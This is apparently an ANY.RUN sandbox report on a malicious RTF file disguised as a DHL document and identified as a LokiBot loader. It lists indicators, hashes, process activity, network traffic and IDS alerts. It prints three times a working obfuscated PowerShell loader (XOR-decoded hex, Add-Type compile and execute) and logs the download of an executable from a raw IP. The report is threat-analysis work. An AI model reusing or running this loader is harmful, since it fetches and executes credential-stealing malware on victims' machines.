analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DHL.1065972.doc

Full analysis: https://app.any.run/tasks/03cf7859-eaa2-48a0-8b4f-a200c8741f63
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 17, 2019, 08:14:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
loader
trojan
lokibot
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

73E906A45C1C1E7D32D589C59F577C81

SHA1:

FD90029398AE983828F26C64E83AA5361C8DCCB9

SHA256:

A4C5A5E5BEF3DB8421E69778F99831E530C0B0A35485D2EA86EBF66E6F10A093

SSDEEP:

1536:oZdMFvtGeCOZQmd1EXsgbAnEppBS1DMO8tdaXj9n6V/nM3ACtLgxxdnKFvtGeCOt:oHM39ngneA+39ngneA+39ngneAPtxS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts Visual C# compiler

      • powershell.exe (PID: 1816)
      • powershell.exe (PID: 1484)
      • powershell.exe (PID: 2088)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3784)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1816)
    • Application was dropped or rewritten from another process

      • e2ae8.exe (PID: 2020)
      • sedgf.exe (PID: 800)
      • sedgf.exe (PID: 2252)
    • Downloads executable files from IP

      • powershell.exe (PID: 1816)
    • Actions looks like stealing of personal data

      • sedgf.exe (PID: 800)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 696)
      • EXCEL.EXE (PID: 3356)
      • EXCEL.EXE (PID: 2972)
      • excelcnv.exe (PID: 3520)
    • Executed via WMI

      • powershell.exe (PID: 1816)
      • powershell.exe (PID: 1484)
      • powershell.exe (PID: 2088)
    • PowerShell script executed

      • powershell.exe (PID: 1816)
      • powershell.exe (PID: 1484)
      • powershell.exe (PID: 2088)
    • Creates files in the user directory

      • powershell.exe (PID: 1816)
      • powershell.exe (PID: 1484)
      • powershell.exe (PID: 2088)
      • e2ae8.exe (PID: 2020)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 1248)
      • powershell.exe (PID: 1816)
      • e2ae8.exe (PID: 2020)
    • Starts Internet Explorer

      • rundll32.exe (PID: 2532)
    • Uses RUNDLL32.EXE to load library

      • WINWORD.EXE (PID: 3784)
    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 3784)
    • Application launched itself

      • sedgf.exe (PID: 2252)
    • Starts itself from another location

      • e2ae8.exe (PID: 2020)
    • Loads DLL from Mozilla Firefox

      • sedgf.exe (PID: 800)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3784)
      • EXCEL.EXE (PID: 696)
      • EXCEL.EXE (PID: 3356)
      • EXCEL.EXE (PID: 2972)
      • excelcnv.exe (PID: 3520)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3784)
      • iexplore.exe (PID: 3484)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3484)
    • Application launched itself

      • iexplore.exe (PID: 2796)
    • Changes internet zones settings

      • iexplore.exe (PID: 2796)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 2796)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3484)
    • Changes settings of System certificates

      • iexplore.exe (PID: 2796)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 2796)
    • Modifies the open verb of a shell class

      • rundll32.exe (PID: 124)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Author: Admin
LastModifiedBy: Admin
CreateDate: 2019:01:07 23:54:00
ModifyDate: 2019:01:07 23:54:00
RevisionNumber: 1
TotalEditTime: -
Pages: 1
Words: -
Characters: 4
CharactersWithSpaces: 4
InternalVersionNumber: 57435
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
61
Monitored processes
22
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs excel.exe no specs powershell.exe excel.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs csc.exe excelcnv.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs rundll32.exe no specs iexplore.exe iexplore.exe e2ae8.exe sedgf.exe no specs rundll32.exe no specs sedgf.exe notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3784"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DHL.1065972.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
696"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
1816powershell -WindowStyle Hidden function d8953 { param($t8785d6) $ra2db3 = 'v13a68';$vecffa = ''; for ($i = 0; $i -lt $t8785d6.length; $i+=2) { $ld2ad = [convert]::ToByte($t8785d6.Substring($i, 2), 16); $vecffa += [char]($ld2ad -bxor $ra2db3[($i / 2) % $ra2db3.length]); } return $vecffa; } $ze8ae2b = '03425a0f51182548401553554d444008585f56624a12425d1b1f6114584c1f5c564f7f560254410e466b13434508555d050a46125f5611116018454c135c1d255f59115f5c124251154208144551185613324f4b02545e4f7f774d444008585f56624a12425d1b1f7d0442037b3b431454541f5213025a5905421300050b41530a074d63325d5f285b4819434749145313435d045a0b44131f24584c0448630e5f56020c1126534c26435c02775c12435612451a5f6c1311435a1a585041454c17455a02165d0e45561358183f5f4731424a56590652010913081b28584c26454141435d420451071a4b02435a0f5118195450050e0d4018083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c560c13437a5717557f08544a17434a431f65564146035a5115114015574c1f5213044e4c13435d417f5602614713164e43520a52025a5e4247135f5611115050530c4e18083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c4b136508444c03505f3144570254501514112b11431454541f52131242590258504153400254410f165a195e5f41475d145202497f560261471316561503505404095a647a0f4268024313170f001757074d164d1f5f4741430e430350531a1819444741435118451312505b425207480d63325d5f285b4819434749147313435d045a0b441f570d5a1a5a11760f424a0f615c08584c4b1361155a751947562c535519434a431a182554472d574b02744113594a4b57520d455d5f6c131242590258504153400254410f164e19585741575a105502021e711845631544181e530700520d5a785d15664c041157530700151d5a0f421801525556535a10180811435a1a585041454c17455a02165118451319505c445251581e110d785d15664c04114a02070014110e41400d15080055541012090a54051054000454550c46010b500e0d15005254521a5f18080850100f52025954054b785d15664c041f690444575f4a540e425756545102005c4457081c7f560261471316564309050252051e040056075d4f194a020700141d57590f0d45191152010d150503510e0e43045150010d10060250020d46045650050c45131a480d5110195d540e0e15550e5c7f5602614713186213435c484d5f19455c41535a1507575350030b647a0f426802431315025a435056570b1023785d15664c0418065a435118451305575d410052560b084d5855491749135350501e5643090502521402055154575d401d031902085a5e4615165c17540450570f5f184806594c19115603550e1203555a4b7a0f45563a6b181c505755020a4b4a031905095a014b07501446490a514b033f5f4731424a56575058020a12540e2c574a0559520d18791a5d5c027e7f1a5e51005a104518082c574a0559520d187b19414a495c59120507531a085a575058020a12541f521f0317535505075b5e5f5616167118456315441018040b57555c58655c28584c40051b481d080e01035054115a575058020a12541f521f0313535057520a100b1336535a355d5a04584c565e00070400100c5d044118215451225a51135f47491f0305454108585f5641500707014b745d175f4a195f5e04584c5876561570571a555613665902591b24584e1f435c0f5b5d18451d32465d1558520d70571a555613187906415f08555902585c0f725902501a4a14642a5401005300541a57590f0d451911540e0d42055151021a5f0a5c52500a4e571d25594f185d5c00527e1f5d564952004f040049140913050655010947015050010d4f010151000c10010751570c45005551070d47010550000c41010051040c13060156550d4f010351050d41010051070c47131a4d465b10000a480d68045e5004454b25455213427118575c415b0a45035155020518544441664a19525612456b025041157f56105e1b11555e47081a5a664a1952561245162545521342101b030053540c42180813534c03435d4106030b4146035a5115114015574c1f521312424a1f5f544152004f040049454c04585d06164b450457001f4305454108585f56445655035a100c1117070b17070b430d4b02435a0f511800045058050c140c6015445118561d245b4802480807594a5e585d1516514b0108080a4b450457001874135f54155e031f1a0e531f431448470416504302045053014b725c0f405d04451d35597a0f455649450b4355524f654d144247135f5611195a4d04115a0005480d4e43520a52025a5d0c1b025e5904181b09030b41005658166656445655035a106a1b08190a5f111641435d420451071874135f54155e655f0a4e13534c03435d41400d1508005554030b4c'; $ze8ae2b2 = d8953($ze8ae2b); Add-Type -TypeDefinition $ze8ae2b2; [a337b9f]::xfd2cb9(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3356"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
1484powershell -WindowStyle Hidden function d8953 { param($t8785d6) $ra2db3 = 'v13a68';$vecffa = ''; for ($i = 0; $i -lt $t8785d6.length; $i+=2) { $ld2ad = [convert]::ToByte($t8785d6.Substring($i, 2), 16); $vecffa += [char]($ld2ad -bxor $ra2db3[($i / 2) % $ra2db3.length]); } return $vecffa; } $ze8ae2b = '03425a0f51182548401553554d444008585f56624a12425d1b1f6114584c1f5c564f7f560254410e466b13434508555d050a46125f5611116018454c135c1d255f59115f5c124251154208144551185613324f4b02545e4f7f774d444008585f56624a12425d1b1f7d0442037b3b431454541f5213025a5905421300050b41530a074d63325d5f285b4819434749145313435d045a0b44131f24584c0448630e5f56020c1126534c26435c02775c12435612451a5f6c1311435a1a585041454c17455a02165d0e45561358183f5f4731424a56590652010913081b28584c26454141435d420451071a4b02435a0f5118195450050e0d4018083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c560c13437a5717557f08544a17434a431f65564146035a5115114015574c1f5213044e4c13435d417f5602614713164e43520a52025a5e4247135f5611115050530c4e18083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c4b136508444c03505f3144570254501514112b11431454541f52131242590258504153400254410f165a195e5f41475d145202497f560261471316561503505404095a647a0f4268024313170f001757074d164d1f5f4741430e430350531a1819444741435118451312505b425207480d63325d5f285b4819434749147313435d045a0b441f570d5a1a5a11760f424a0f615c08584c4b1361155a751947562c535519434a431a182554472d574b02744113594a4b57520d455d5f6c131242590258504153400254410f164e19585741575a105502021e711845631544181e530700520d5a785d15664c041157530700151d5a0f421801525556535a10180811435a1a585041454c17455a02165118451319505c445251581e110d785d15664c04114a02070014110e41400d15080055541012090a54051054000454550c46010b500e0d15005254521a5f18080850100f52025954054b785d15664c041f690444575f4a540e425756545102005c4457081c7f560261471316564309050252051e040056075d4f194a020700141d57590f0d45191152010d150503510e0e43045150010d10060250020d46045650050c45131a480d5110195d540e0e15550e5c7f5602614713186213435c484d5f19455c41535a1507575350030b647a0f426802431315025a435056570b1023785d15664c0418065a435118451305575d410052560b084d5855491749135350501e5643090502521402055154575d401d031902085a5e4615165c17540450570f5f184806594c19115603550e1203555a4b7a0f45563a6b181c505755020a4b4a031905095a014b07501446490a514b033f5f4731424a56575058020a12540e2c574a0559520d18791a5d5c027e7f1a5e51005a104518082c574a0559520d187b19414a495c59120507531a085a575058020a12541f521f0317535505075b5e5f5616167118456315441018040b57555c58655c28584c40051b481d080e01035054115a575058020a12541f521f0313535057520a100b1336535a355d5a04584c565e00070400100c5d044118215451225a51135f47491f0305454108585f5641500707014b745d175f4a195f5e04584c5876561570571a555613665902591b24584e1f435c0f5b5d18451d32465d1558520d70571a555613187906415f08555902585c0f725902501a4a14642a5401005300541a57590f0d451911540e0d42055151021a5f0a5c52500a4e571d25594f185d5c00527e1f5d564952004f040049140913050655010947015050010d4f010151000c10010751570c45005551070d47010550000c41010051040c13060156550d4f010351050d41010051070c47131a4d465b10000a480d68045e5004454b25455213427118575c415b0a45035155020518544441664a19525612456b025041157f56105e1b11555e47081a5a664a1952561245162545521342101b030053540c42180813534c03435d4106030b4146035a5115114015574c1f521312424a1f5f544152004f040049454c04585d06164b450457001f4305454108585f56445655035a100c1117070b17070b430d4b02435a0f511800045058050c140c6015445118561d245b4802480807594a5e585d1516514b0108080a4b450457001874135f54155e031f1a0e531f431448470416504302045053014b725c0f405d04451d35597a0f455649450b4355524f654d144247135f5611195a4d04115a0005480d4e43520a52025a5d0c1b025e5904181b09030b41005658166656445655035a106a1b08190a5f111641435d420451071874135f54155e655f0a4e13534c03435d41400d1508005554030b4c'; $ze8ae2b2 = d8953($ze8ae2b); Add-Type -TypeDefinition $ze8ae2b2; [a337b9f]::xfd2cb9(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2972"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3888"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\gll-tedv.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
2924C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES4B0.tmp" "c:\Users\admin\AppData\Local\Temp\CSC4AF.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
2088powershell -WindowStyle Hidden function d8953 { param($t8785d6) $ra2db3 = 'v13a68';$vecffa = ''; for ($i = 0; $i -lt $t8785d6.length; $i+=2) { $ld2ad = [convert]::ToByte($t8785d6.Substring($i, 2), 16); $vecffa += [char]($ld2ad -bxor $ra2db3[($i / 2) % $ra2db3.length]); } return $vecffa; } $ze8ae2b = '03425a0f51182548401553554d444008585f56624a12425d1b1f6114584c1f5c564f7f560254410e466b13434508555d050a46125f5611116018454c135c1d255f59115f5c124251154208144551185613324f4b02545e4f7f774d444008585f56624a12425d1b1f7d0442037b3b431454541f5213025a5905421300050b41530a074d63325d5f285b4819434749145313435d045a0b44131f24584c0448630e5f56020c1126534c26435c02775c12435612451a5f6c1311435a1a585041454c17455a02165d0e45561358183f5f4731424a56590652010913081b28584c26454141435d420451071a4b02435a0f5118195450050e0d4018083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c560c13437a5717557f08544a17434a431f65564146035a5115114015574c1f5213044e4c13435d417f5602614713164e43520a52025a5e4247135f5611115050530c4e18083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c4b136508444c03505f3144570254501514112b11431454541f52131242590258504153400254410f165a195e5f41475d145202497f560261471316561503505404095a647a0f4268024313170f001757074d164d1f5f4741430e430350531a1819444741435118451312505b425207480d63325d5f285b4819434749147313435d045a0b441f570d5a1a5a11760f424a0f615c08584c4b1361155a751947562c535519434a431a182554472d574b02744113594a4b57520d455d5f6c131242590258504153400254410f164e19585741575a105502021e711845631544181e530700520d5a785d15664c041157530700151d5a0f421801525556535a10180811435a1a585041454c17455a02165118451319505c445251581e110d785d15664c04114a02070014110e41400d15080055541012090a54051054000454550c46010b500e0d15005254521a5f18080850100f52025954054b785d15664c041f690444575f4a540e425756545102005c4457081c7f560261471316564309050252051e040056075d4f194a020700141d57590f0d45191152010d150503510e0e43045150010d10060250020d46045650050c45131a480d5110195d540e0e15550e5c7f5602614713186213435c484d5f19455c41535a1507575350030b647a0f426802431315025a435056570b1023785d15664c0418065a435118451305575d410052560b084d5855491749135350501e5643090502521402055154575d401d031902085a5e4615165c17540450570f5f184806594c19115603550e1203555a4b7a0f45563a6b181c505755020a4b4a031905095a014b07501446490a514b033f5f4731424a56575058020a12540e2c574a0559520d18791a5d5c027e7f1a5e51005a104518082c574a0559520d187b19414a495c59120507531a085a575058020a12541f521f0317535505075b5e5f5616167118456315441018040b57555c58655c28584c40051b481d080e01035054115a575058020a12541f521f0313535057520a100b1336535a355d5a04584c565e00070400100c5d044118215451225a51135f47491f0305454108585f5641500707014b745d175f4a195f5e04584c5876561570571a555613665902591b24584e1f435c0f5b5d18451d32465d1558520d70571a555613187906415f08555902585c0f725902501a4a14642a5401005300541a57590f0d451911540e0d42055151021a5f0a5c52500a4e571d25594f185d5c00527e1f5d564952004f040049140913050655010947015050010d4f010151000c10010751570c45005551070d47010550000c41010051040c13060156550d4f010351050d41010051070c47131a4d465b10000a480d68045e5004454b25455213427118575c415b0a45035155020518544441664a19525612456b025041157f56105e1b11555e47081a5a664a1952561245162545521342101b030053540c42180813534c03435d4106030b4146035a5115114015574c1f521312424a1f5f544152004f040049454c04585d06164b450457001f4305454108585f56445655035a100c1117070b17070b430d4b02435a0f511800045058050c140c6015445118561d245b4802480807594a5e585d1516514b0108080a4b450457001874135f54155e031f1a0e531f431448470416504302045053014b725c0f405d04451d35597a0f455649450b4355524f654d144247135f5611195a4d04115a0005480d4e43520a52025a5d0c1b025e5904181b09030b41005658166656445655035a106a1b08190a5f111641435d420451071874135f54155e655f0a4e13534c03435d41400d1508005554030b4c'; $ze8ae2b2 = d8953($ze8ae2b); Add-Type -TypeDefinition $ze8ae2b2; [a337b9f]::xfd2cb9(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3684"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vm6iqtzo.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Total events
3 762
Read events
3 028
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
8
Text files
27
Unknown types
15

Dropped files

PID
Process
Filename
Type
3784WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF1B3.tmp.cvr
MD5:
SHA256:
696EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRF9F1.tmp.cvr
MD5:
SHA256:
3356EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRFF9E.tmp.cvr
MD5:
SHA256:
1816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BG9WNIUGS2T0BSCZ808K.temp
MD5:
SHA256:
2972EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR309.tmp.cvr
MD5:
SHA256:
3888csc.exeC:\Users\admin\AppData\Local\Temp\CSC4AF.tmp
MD5:
SHA256:
3888csc.exeC:\Users\admin\AppData\Local\Temp\gll-tedv.pdb
MD5:
SHA256:
1484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J6BETXUNHXTMM05MURX2.temp
MD5:
SHA256:
2924cvtres.exeC:\Users\admin\AppData\Local\Temp\RES4B0.tmp
MD5:
SHA256:
3888csc.exeC:\Users\admin\AppData\Local\Temp\gll-tedv.dll
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
12
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3484
iexplore.exe
GET
301
2.16.186.24:80
http://shell.windows.com/fileassoc/fileassoc.asp?Ext=json
unknown
whitelisted
3484
iexplore.exe
GET
302
23.222.42.9:80
http://go.microsoft.com/fwlink/?LinkId=57426&Ext=json
NL
whitelisted
1816
powershell.exe
GET
200
35.225.200.121:80
http://35.225.200.121/DD/106597
US
executable
598 Kb
suspicious
2796
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3484
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
1816
powershell.exe
35.225.200.121:80
US
suspicious
3484
iexplore.exe
2.16.186.24:80
shell.windows.com
Akamai International B.V.
whitelisted
2796
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
2796
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3484
iexplore.exe
23.222.42.9:80
go.microsoft.com
Akamai Technologies, Inc.
NL
whitelisted
3484
iexplore.exe
40.90.23.242:443
login.live.com
Microsoft Corporation
US
unknown

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
go.microsoft.com
  • 23.222.42.9
whitelisted
shell.windows.com
  • 2.16.186.24
  • 2.16.186.27
whitelisted
login.live.com
  • 40.90.23.242
  • 40.90.23.210
  • 40.90.23.235
whitelisted

Threats

PID
Process
Class
Message
1816
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1816
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1816
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
A Network Trojan was detected
ET TROJAN LokiBot Checkin
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144